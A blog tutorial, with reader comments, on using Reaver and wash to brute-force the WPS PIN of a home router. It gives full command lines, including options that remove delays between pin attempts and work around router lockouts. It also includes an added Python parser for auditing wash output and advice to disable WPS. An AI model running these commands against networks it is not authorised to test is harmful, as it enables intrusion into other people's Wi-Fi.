
WPS – How to install and use Reaver to detect the WPS on your home router


WPS was supposed to make security easier; alas, it destroyed much of your security. Install Reaver to see what I mean.

Step 1 – Download Reaver

sudo apt-get install aircrack-ng reaver


Step 2 – Put your wireless card into “monitor mode”

sudo airmon-ng

Check that your wireless cards are detected.

sudo airmon-ng start wlan0


Step 3 – Find the Unique ID of your Router

airodump-ng mon0

Control + C – to stop airodump-ng so you can cut and paste the base station ID (BSSID)

Open a second root terminal


Step 4 – Use Wash to find WPS Routers

wash -i mon0

Note: if you get FCS errors, tell wash to ignore them:

wash -i mon0 --ignore-fcs


Step 5 – Start Reaver running against your router’s ID

Cut and paste the Basestation MAC from your first terminal

reaver -i mon0 -b AA:BB:CC:65:FF:B4 -vv

This means:

-i mon0 (monitoring interface). You need to put wlan0 into monitor mode as mon0 so it can listen to all packets.

-b bssid (base station ID) that you are attacking. The BSSID is the MAC address of the router. The ESSID is the human-readable name of the router, e.g. “useless” or “wobbly”.

-vv (very verbose)

Usually, the only required arguments to Reaver are the interface name and the BSSID of the target AP.


Step 6 – Useful Reaver options for running against your router’s ID

By default, if the AP switches channels, Reaver will also change its channel accordingly. However, this feature may be disabled by fixing the interface’s channel:

reaver -i mon0 -b 00:01:02:03:04:05 --fixed


The default receive timeout period is 5 seconds. This timeout period can be set manually if necessary (minimum timeout period is 1 second):

reaver -i mon0 -b 00:01:02:03:04:05 -t 2


The default delay period between pin attempts is 1 second. This value can be increased or decreased to any non-negative integer value. A value of zero means no delay:

reaver -i mon0 -b 00:01:02:03:04:05 -d 0


Some APs will temporarily lock their WPS state, typically for five minutes or less, when “suspicious” activity is detected. The time Reaver waits for such a lock to clear can be set:

reaver -i mon0 -b 00:01:02:03:04:05 --lock-delay=250


For additional output, the verbose option may be provided. Providing the verbose option twice will increase verbosity and display each pin number as it is attempted:

reaver -i mon0 -b 00:01:02:03:04:05 -vv


When 10 consecutive unexpected WPS errors are encountered, a warning message will be displayed. Since this may be a sign that the AP is rate limiting pin attempts or simply being overloaded, a sleep can be put in place that will occur whenever these warning messages appear:

reaver -i mon0 -b 00:01:02:03:04:05 --fail-wait=120


Additional Info – Setting the exact channel etc.

reaver -i mon0 -b (bssid) -vv -c (channel) -e (name of AP) -p (wps pin)


Step 7 – Background info on Wash

WPS is set up using either a push button on the router or a PIN. Wash targets the PIN-based WPS systems, not the push-button system.

Wash will only show access points that support WPS.
Wash displays the following information for each discovered access point:

    BSSID        The BSSID of the AP
    Channel      The AP's channel, as specified in the AP's beacon packet
    WPS Version  The WPS version supported by the AP
    WPS Locked   The locked status of WPS, as reported in the AP's beacon packet
    ESSID        The ESSID of the AP
However, wash can be instructed to send probe requests to each AP in order to obtain more information about the AP:

wash -i mon0 --scan

By sending probe requests, wash will elicit a probe response from each AP. For WPS-capable APs, the WPS information element typically contains additional information about the AP, including make, model, and version data. This data is stored in the survey table of the reaver.db database.
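The fields wash reports (listed above) are enough for a quick self-audit: after you disable WPS, your own router should no longer appear in a wash scan at all. The following is an added example, not code from the original post or from the Reaver project; it parses wash-style table text (constructed sample rows, made-up BSSIDs) and reports whether a given router is absent, locked or still open to PIN attempts.

```python
# Added example, not from the original post: parse wash-style scan output and check
# whether your own router still advertises WPS. Columns follow the fields the post
# lists (BSSID, Channel, WPS Version, WPS Locked, ESSID); sample rows are constructed.
import re
from dataclasses import dataclass

SAMPLE_WASH_OUTPUT = """\
BSSID              Channel  WPS Version  WPS Locked  ESSID
---------------------------------------------------------------
AA:BB:CC:65:FF:B4  6        1.0          No          wobbly
00:01:02:03:04:05  11       2.0          Yes         useless
DE:AD:BE:EF:00:01  1        1.0          No          Garden AP
"""

_MAC_RE = re.compile(r"(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}")


@dataclass
class WpsEntry:
    bssid: str
    channel: int
    version: str
    locked: bool
    essid: str


def parse_wash(text: str) -> list:
    """Turn wash-like table text into WpsEntry objects; header and rule lines are skipped."""
    entries = []
    for line in text.splitlines():
        # ESSIDs may contain spaces, so split at most four times and keep the rest whole.
        parts = line.split(maxsplit=4)
        if len(parts) < 5 or not _MAC_RE.fullmatch(parts[0]):
            continue
        bssid, channel, version, locked, essid = parts
        entries.append(WpsEntry(bssid.upper(), int(channel), version, locked.lower() == "yes", essid.strip()))
    return entries


def audit_router(entries: list, own_bssid: str) -> str:
    """'absent' = WPS not advertised (what you want after disabling it);
    'locked' = advertised but currently locked; 'unlocked' = advertised and open to PIN attempts."""
    for e in entries:
        if e.bssid == own_bssid.upper():
            return "locked" if e.locked else "unlocked"
    return "absent"


if __name__ == "__main__":
    found = parse_wash(SAMPLE_WASH_OUTPUT)
    for e in found:
        print(f"{e.bssid} ch{e.channel:<3} WPS {e.version} locked={e.locked} {e.essid}")
    print("my router:", audit_router(found, "aa:bb:cc:65:ff:b4"))
```

Feed it the real output of wash -i mon0 (saved to a file) and your own BSSID from Step 3; anything other than "absent" means WPS is still switched on.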

How long?

Between 2 and 10 hours later, Reaver will hand over the router's WPS PIN.


Your router may “rate limit” after, say, 5 minutes of attacks – mine does.
It may then rate limit your attacks and only allow 1 attempt per minute.


You are advised to turn off WPS on your router.
Or buy a router that has “rate limiting” against WPS attacks.


N1ksana


Hi, I have one question. I have done access point mapping using airodump-ng, so I have collected so many APs with different encryption; some of them are open APs. Are there any tools or web services available for visualization?
I found this website, but are there any other sources available?



The “wash” command seems not to be working any more. Is there any other alternative?


• Hi Francesco,
  Wash has several issues when you first use it. The first is easily resolved by creating a new directory. I’ve pasted this comment in, as it might apply to your setup.
  Just thought I’d chime in in case someone stumbles across this post. The reason it isn’t working is because a directory doesn’t exist where wash is attempting to write the db file. The fix is simply a folder creation.

      mkdir /etc/reaver

      The wash forum reference links are:

      Let me know how you get on.


    But only if I run before:

    – ifconfig wlan0 down
    – iwconfig wlan0 mode monitor
    – ifconfig wlan0 up
    – airodump-ng wlan0

    The command:

    – airmon-ng start wlan0

is not working any more. I was using “wash” and “reaver” with the commands you wrote above a few years ago on Kali. Today I run Debian Jessie.
Could this be the difference?


    • Hi Francesco,

It looks like airmon has changed its syntax – I found this comment:

      OK, better explanation is mon0,mon1 etc. are no more.

      It has been replaced by wlan0mon,wlan1mon etc. It was replaced because this is (supposedly) a new and better method to put cards into monitor mode. “With the release of Aircrack-ng 1.2 RC2, aircrack-zc has officially replaced the original aircrack-ng, as the new standard.” I liked the old way just fine and so did my scripts..

So that explains a lot!! It’s fantastic news that you’ve got it working.

